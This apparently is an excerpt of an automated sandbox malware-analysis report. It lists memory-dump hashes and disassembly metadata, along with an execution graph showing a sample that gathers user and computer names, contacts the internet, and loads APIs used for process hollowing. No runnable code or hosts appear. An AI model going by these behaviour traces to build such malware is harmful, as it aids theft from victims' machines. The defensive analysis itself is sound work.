                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 05ae0d58848df2b8617f688720a2b785f69469f91b757b17d19a746472952dc4
                                                                                                                                                                                                                          • Instruction ID: 5bdeeea9431c50b82dafd169023e59c2df77b8eb44727e85d4468d7042efac46
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05ae0d58848df2b8617f688720a2b785f69469f91b757b17d19a746472952dc4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0A7317007149FD7349A6DE844A7F77E9EBC8675B00052DE50AC3740DF34AC0187A0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c0c284c931b3747dea58f9a7a53ba6fa09e75c492ddcd48ce62e47797546102a
                                                                                                                                                                                                                          • Instruction ID: fbdf2bbbc1a3d6085f5382be8c671ba89487d36041a65a0836181183f9d5a7b4
• Opcode Fuzzy Hash: c0c284c931b3747dea58f9a7a53ba6fa09e75c492ddcd48ce62e47797546102a
• Instruction Fuzzy Hash: 00F0F976100A40AFD725CF06CD85D23BBB9EF85620B198599E85A4B712C671FC42CFA0
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 68c09e5a1c83c83ba629cda8991575e31960df4b73fd7bd6090098d84721a141
• Instruction ID: 336f4c45b88bbf53308ca69c45c295aa0004ee13cdfd66d2cd7aaefb672f878d
• Opcode Fuzzy Hash: 68c09e5a1c83c83ba629cda8991575e31960df4b73fd7bd6090098d84721a141
• Instruction Fuzzy Hash: CDF065397005188FDB10DB7DDC40A9ABBE2EFCC65571541A9EA0ACB314DF38EC058B91
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 90ac516283a28e58767b378c1154ef4a59c6386a44aaf94ac205d1c6abd74a27
• Instruction ID: b80b321ff6f5f875a4a3698eec8ee9ebca721b12a7a22dd37757a7215a38cee0
• Opcode Fuzzy Hash: 90ac516283a28e58767b378c1154ef4a59c6386a44aaf94ac205d1c6abd74a27
• Instruction Fuzzy Hash: F8F027316001049BE314AF69D01839FBBA6DBC171CF10816ACA0A47385CE3A7842CBE0
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7d94f22a28956ab9a8cb32a2985cd65a6add4c1d1f0f457ba3cda7194ee4f86b
• Instruction ID: d3bf4cb6582c65be70be16ae5b5abe56367034b69f43215267fb91770b53edf3
• Opcode Fuzzy Hash: 7d94f22a28956ab9a8cb32a2985cd65a6add4c1d1f0f457ba3cda7194ee4f86b
• Instruction Fuzzy Hash: 83E0D8623163115F971476B9885037A768FCBC7660B0612F7C513C7291DD18EC4A83F2
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ec2139265ed3a5af1770f6b2bb492120c5e00dcb328238025aa2d43390e836a8
• Instruction ID: ea147efcf3cd5ee55a96153cb9ef029155737e0f9a84841293af1c012335e7e6
• Opcode Fuzzy Hash: ec2139265ed3a5af1770f6b2bb492120c5e00dcb328238025aa2d43390e836a8
• Instruction Fuzzy Hash: F4E0E5393002108F87149F1DD498D6AB7EAEFDEA6531904A9E94ACB321DA61EC02CB90
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c06e27420a02171e4c31df941ad9bd18495ce1ddbbabcdf77781b4609f5120e1
• Instruction ID: e91361a791c4f1125c513577b8774cd6e994943c26ffb83d6b70de4de8871fc5
• Opcode Fuzzy Hash: c06e27420a02171e4c31df941ad9bd18495ce1ddbbabcdf77781b4609f5120e1
• Instruction Fuzzy Hash: F8E092253093915B8B16A22DA8604627B77DBD722070944FFE046CB252DD15A802C765
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 502cb15cdf7995d2191997121357841ae6e70fa73a9b8d1f9c3e2823325a41d8
• Instruction ID: 2e7ad1ef3d05853571c43d5d8aefc81473d8751634285d41bce4287da7f4ad8d
• Opcode Fuzzy Hash: 502cb15cdf7995d2191997121357841ae6e70fa73a9b8d1f9c3e2823325a41d8
• Instruction Fuzzy Hash: D5E0D83170461057DB197775D41C6AEFA6AEBC4725F05516EEB0783341CF396802C3D5
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 73be35a31dae3bcb689988913f1868fb0c784163e678c584d7eb6acdd429369a
• Instruction ID: f9efd21eb05e9595ea4c7bad036f68016536db663ca264d88aeab8916e073401
• Opcode Fuzzy Hash: 73be35a31dae3bcb689988913f1868fb0c784163e678c584d7eb6acdd429369a
• Instruction Fuzzy Hash: 13E086667042584FDB10A6A86C186EF7BE6EBC9261F0440BADA4AC3291DF1C5C0583E1
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 117a0b2f22885bca30e8d9fda74b95e9978cdf1c6eb9405225fefa8caa098fef
• Instruction ID: 683b24f7c219739ec2427d06f9fc7af4daf1c15a72570c1d85fb1a8c8638304f
• Opcode Fuzzy Hash: 117a0b2f22885bca30e8d9fda74b95e9978cdf1c6eb9405225fefa8caa098fef
• Instruction Fuzzy Hash: 58F0ED709007049BD764DFB9D89C79ABBE5EB44324F10446DD65EC7340DB396880CB90
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9fae3cb97359c1f8f83f67fc12d35b363785008083263e71ad7fd253b8b3395c
• Instruction ID: 85f0b02303dc6bff3d13ca831c2f0aa805ba1530463d2584ffb0252c72d52d0b
• Opcode Fuzzy Hash: 9fae3cb97359c1f8f83f67fc12d35b363785008083263e71ad7fd253b8b3395c
• Instruction Fuzzy Hash: 68E02631304A1057CB187775A82C6AEBA5AEBC8728F01006EDB0783381CF38280283D9
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 50b892f27e081fc1900caa3079ab568b4367b291f26743a650f8935ba78485fa
• Instruction ID: 827b942912552637d90f58de041055600496b0c5cc2787da3b3398c6b06f0218
• Opcode Fuzzy Hash: 50b892f27e081fc1900caa3079ab568b4367b291f26743a650f8935ba78485fa
• Instruction Fuzzy Hash: 33D05E527022250B5A6434AA58006BFA5CFCAC64A570610B6DA07D7241EC58EC1A03F2
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: ba71e2c65ed3fbfd454359874141c6563d25da9c0bb013384d98e65527d0593f
• Instruction ID: f417c02db689a8ce31bd70648f9a3d5e687b4f8fa10c29fdf6d1c34f9a58d942
• Opcode Fuzzy Hash: ba71e2c65ed3fbfd454359874141c6563d25da9c0bb013384d98e65527d0593f
• Instruction Fuzzy Hash: F5E08C32700B14478326662EA80085E769EEFC99B5315406EE81AC7300DE68EC024BEA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction ID: 330f3eae67b08680b3a290de0975381971601982562fe17043e5053112ce8583
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8E08631B00014978B089599D4504E9F7A9DBCC220F04887ED90AA7340EA32691686E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                                                                                                                                                                          • Instruction ID: 7b716c30f73189ad5d56190fbe638093fd8240ad169a2c7d06de72c676098823
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e3898340946de835c4bc365ffcc22e1076fcac4241bc505e8214be1a1f22c35
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47E01231805209DFC709FFB4D46A4B9BB34FB11301F4101FDD51387251EA311A46CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b74b5ea80e0dee61b1fca14147485a4beab85c726bb1340c7a6abd69aadb77b9
                                                                                                                                                                                                                          • Instruction ID: 6ecb75b34c98dd5cb65ea2920f631b8e6605579a6375d48a50c661cec8ff0613
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b74b5ea80e0dee61b1fca14147485a4beab85c726bb1340c7a6abd69aadb77b9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CE09A34A0830A9BC704EFA8D056469FFB0FB46304F0245A9DE8A87341E6309C41CB80
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ccd898aeb87d60cb8ba329781a4a980347ad9b6d49cc44903ed7f564b6a87b8c
                                                                                                                                                                                                                          • Instruction ID: 0b92532ebbc6d91e66a9660cd759d12351782486bf15c12a142642e24a37b7ba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ccd898aeb87d60cb8ba329781a4a980347ad9b6d49cc44903ed7f564b6a87b8c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2BE01A70E082469FCB80DFAC94815A9FFF0EB59200B2481EED919EA205E2324612CB81
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction ID: 86a68231802f548c39d31db65ce9f4fcaa3431c5667e72413c8e35290266029e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07D067B0E04209DF8780EFADD94156EFBF4EB48200F6085AA891DE7301F7329A12DBD1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                                                                                                                                                                          • Instruction ID: 4edb217ce4126973728bfbe3219465ce59805d2ea08f7851b64effa099227ff8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be01f2936f57dbc65e5b934ff463f44ac3846e5a8d54b33ebf80feee1c957365
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48D017308061098BCB18ABA4E82B4BDBB34FA00301F4111ADD91752291EE322A4ACAC0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 21bc43c4d58c3a16a21c9e854e686765b9716a5ac2bd7fedaa2577a36289b5b0
                                                                                                                                                                                                                          • Instruction ID: a648413165010ac0b1f6815e4f6c8f13d3f5a5988f96616ddfddc9efa4dac09d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21bc43c4d58c3a16a21c9e854e686765b9716a5ac2bd7fedaa2577a36289b5b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19D01234A0430A8B8714EF64D45686EBFB4E744304F0041A9DE4693344EA305801CBC1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c988f3a2bb385adab1474bd5f27fd941e289f2657a41d6ec8f31c38a3e9f01ce
                                                                                                                                                                                                                          • Instruction ID: 0119501aebd63739453361b0f14dc289b441198d23ea7dd58a2ab9b264f85e01
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c988f3a2bb385adab1474bd5f27fd941e289f2657a41d6ec8f31c38a3e9f01ce
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BC08C104283808EEF038B304C220017F309F432003471AC2E800DB1B2D9288C01C72A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
• Opcode ID: 3b90434c49796b4ec28e0a6b6e30b31b0ecfeb9206e69ea43f201425096cd47c
• Instruction ID: f1f609735611311561bd89a668cfbc8e0df6f8f01ee7f487b8e2e34d5a46ce10
• Opcode Fuzzy Hash: 3b90434c49796b4ec28e0a6b6e30b31b0ecfeb9206e69ea43f201425096cd47c
• Instruction Fuzzy Hash: 74C01234005240CBCA254FB4A0444203F31EF8122A32208EAE81A0FAA3DA3A988ACB08
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7ac153a948efc777a12d10f12e91eb61f68b4fef70a3a3d4e3773a9d2870ab1b
• Instruction ID: 55ed5f906cc434ed256fc1fc87fa4182179cf45098791d675e51e7a55f24860a
• Opcode Fuzzy Hash: 7ac153a948efc777a12d10f12e91eb61f68b4fef70a3a3d4e3773a9d2870ab1b
• Instruction Fuzzy Hash: E9B09230048708CFC2686FB9A4048247B29BB4022638004A9ED1E4AA939E3BE886CA48
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID: Kn^$Kn^$Kn^$Kn^$Kn^
• API String ID: 0-2587265418
• Opcode ID: 7ff452a8ab99bf9b9d4cedabcdef66319dbad21e54342b89c9b3eda1f19a9704
• Instruction ID: d3e10c188e5a6996de110e305ae9504fa4b4e5d16f3aa5ee783511089e2d0254
• Opcode Fuzzy Hash: 7ff452a8ab99bf9b9d4cedabcdef66319dbad21e54342b89c9b3eda1f19a9704
• Instruction Fuzzy Hash: A231F42650E3C14FD35A873998A82927F74BF63188B1E41EBC0C88F1A3D919555B879B
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• API ID:
• String ID: Kn^$Kn^$Kn^$Kn^
• API String ID: 0-1187634490
• Opcode ID: 0f39225254e38fad32dbd70442b8e73eff71d7d6e370346ea9138bdfdd326470
• Instruction ID: 78e0085dc38c8cc2828c5f014735b63f8bfe2664f44844f501275653cd8e70aa
• Opcode Fuzzy Hash: 0f39225254e38fad32dbd70442b8e73eff71d7d6e370346ea9138bdfdd326470
• Instruction Fuzzy Hash: E441A0216093C14FD3179B3D98A46D27FF0BF97598B0A41DBD4C8CF2A3DA289849C796

Execution Graph

Execution Coverage: 2.3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 6%
Total number of Nodes: 50
Total number of Limit Nodes: 0
execution_graph 10681 43e893 10682 43e895 10681->10682 10691 40130b memset memset 10682->10691 10684 43e8b0 10685 4010c6 VirtualAllocExNuma 10684->10685 10686 43e8ba 10685->10686 10687 40168c GetPEB 10686->10687 10688 43e8c4 10687->10688 10689 43d191 OpenEventA 10688->10689 10690 43e8e2 10689->10690 10692 40135d 10691->10692 10693 431442 10694 431454 GetUserNameA 10693->10694 10696 431480 10697 431492 GetComputerNameA 10696->10697 10699 440f40 10700 440f57 LoadLibraryA 10699->10700 10702 441399 10700->10702 10703 401046 VirtualAlloc 10704 401070 10703->10704 10705 43d4eb 10706 43d508 CreateDirectoryA 10705->10706 10708 43d5e4 10706->10708 10714 43c684 10708->10714 10715 43c6a4 10714->10715 10718 43c1c2 10715->10718 10719 43c1f0 10718->10719 10728 418160 InternetCloseHandle 10719->10728 10730 417e7d 10719->10730 10733 417f58 10719->10733 10736 417ec8 10719->10736 10739 417d09 10719->10739 10743 417e16 InternetConnectA 10719->10743 10744 418024 InternetReadFile 10719->10744 10729 418116 10728->10729 10731 417ecf HttpOpenRequestA 10730->10731 10734 417f73 HttpSendRequestA 10733->10734 10735 417fa9 10734->10735 10737 417ecf HttpOpenRequestA 10736->10737 10740 417d40 InternetOpenA 10739->10740 10742 417dc4 10740->10742 10745 414de8 10746 414e0f InternetCrackUrlA 10745->10746 10748 414ec1 10746->10748 10749 44163a 10750 44165c LoadLibraryA 10749->10750 10752 442112 LoadLibraryA LoadLibraryA 10750->10752 10753 44217b LoadLibraryA LoadLibraryA 10752->10753 10755 442220 LoadLibraryA 10753->10755 10756 4016ef lstrcmpiW

Control-flow Graph

control_flow_graph 151 431442-43147f GetUserNameA
APIs
• GetUserNameA.ADVAPI32(00000000), ref: 00431475
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
• Instruction ID: 25aa36c17c4d92c73a0d58bc3163748de46586a953a07f777331ccfe371363d9
• Opcode Fuzzy Hash: b3eafffca078be2ca2c018cc31f46bd908eb18f9321fcc2fcf0672908623ba27
• Instruction Fuzzy Hash: 6AE086B23011102FD619975DAC81FAB739DDFC8264B0A0035F504C3310E6646C2187BA

Control-flow Graph

control_flow_graph 157 418024-41805c InternetReadFile
APIs
• InternetReadFile.WININET(?,?,000007CF,?), ref: 0041803A
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
Similarity
• API ID: FileInternetRead
• String ID:
• API String ID: 778332206-0
• Opcode ID: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
• Instruction ID: b6fb03e5c75202f5bdf7690399e95dcf118b51c36a476518bdd44740d121225c
• Opcode Fuzzy Hash: 9e5e9da609210bfc34dd9cb12f2909040bfa62032e106f0ed9d883535949a094
• Instruction Fuzzy Hash: BDE04F31B1012B9FEB14DB60DC84E5233BABBC8704B108468D105A7115E6B1A907CF91

Control-flow Graph

control_flow_graph 0 44163a-44224d LoadLibraryA * 6
APIs
• LoadLibraryA.KERNEL32(0066B8DB), ref: 004420E9
• LoadLibraryA.KERNEL32(0066B8F3), ref: 0044212F
• LoadLibraryA.KERNEL32(0066B8FF), ref: 00442152
• LoadLibraryA.KERNEL32(0066B926), ref: 004421BB
• LoadLibraryA.KERNEL32(0066B931), ref: 004421DE
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00442224
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2748411746.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2748389812.0000000000400000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748452004.000000000044C000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748477597.000000000045C000.00000008.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.000000000046A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000055B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.0000000000561000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000066A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748505795.000000000067D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000E.00000002.2748830177.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                          • String ID: CreateProcessA$GetThreadContext$ReadProcessMemory$ResumeThread$SetThreadContext$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                          • API String ID: 1029625771-2674769033
                                                                                                                                                                                                                          • Opcode ID: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
                                                                                                                                                                                                                          • Instruction ID: fb63d92a9f115e913b2f9b718a076d9a6120d16dab0c00aa961a01dad6639e5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2e29452b506b0bcd63bc073f10d87eac2d6dbddab4f12e8569b0d0ddb8d4792
